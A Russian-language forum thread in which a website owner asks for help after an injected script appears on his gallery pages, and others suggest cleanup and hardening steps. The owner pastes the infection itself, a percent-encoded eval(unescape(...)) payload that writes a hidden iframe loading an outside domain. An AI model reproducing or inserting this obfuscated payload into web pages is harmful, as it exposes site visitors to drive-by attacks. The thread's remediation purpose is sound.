Таинственный скрипт

здравствуйте коллеги
как то ко мне на сервер попала какая то «гадина» и теперь на всех фрихах на main.html, и на index.html галереях, появляется скрипт, который открывает какой то левый сайт.
и как следствие работа встала, коже меня с такими сайтами возьмёт(((
подскажите пожалуйста, как мне это исправить
Спасибо!

лезь на хост и гляди какие свежезалитые файлы есть. найдёшь кого подозрительного, сразу по этой дате остальных ищи. и убивай, естественно.

проверь свои скрипты на возможные уязвимости. google>Script name + vulnerability

машину свою проверь на троев.

фтп на свой айпи настрой через файрволл.

Тело больного в студию ;), телепатов тут нет

Попробую на вскидку, проверь конфиги .htaccess на наличие директив auto_prepend_file и auto_append_file

больноной

eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%39%34%38%61%35%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%61%6c%61%73%6b%61%32%2e%69%6e%66%6f%2f%33%34%2f%69%6e%64%65%78%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%31%37%38%30%37%35%29%2b%27%32%5c%27%20%77%69%64%74%68%3d%34%32%35%20%68%65%69%67%68%74%3d%34%31%39%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29"));

1. Проверьте компьютер на вирусы.
2. Зайдите по ftp в аккаунт и в файлах index.html, mail.html удалите тэги <script> вредоносный код </script>
3. Проверьте права на папки. Если установлены 0777 измените на 0755 т.к. 0777 позволяет записывать файлы в папку.
4. Измените пароль на ftp, панель управления.

nikoloster:
спасибо!

формат с:

практика показала, что антивирусники такую каку на компе не опредиляли (только их следы видели, сама кака бегала безнаказанно). руками приходилось выискивать, убивать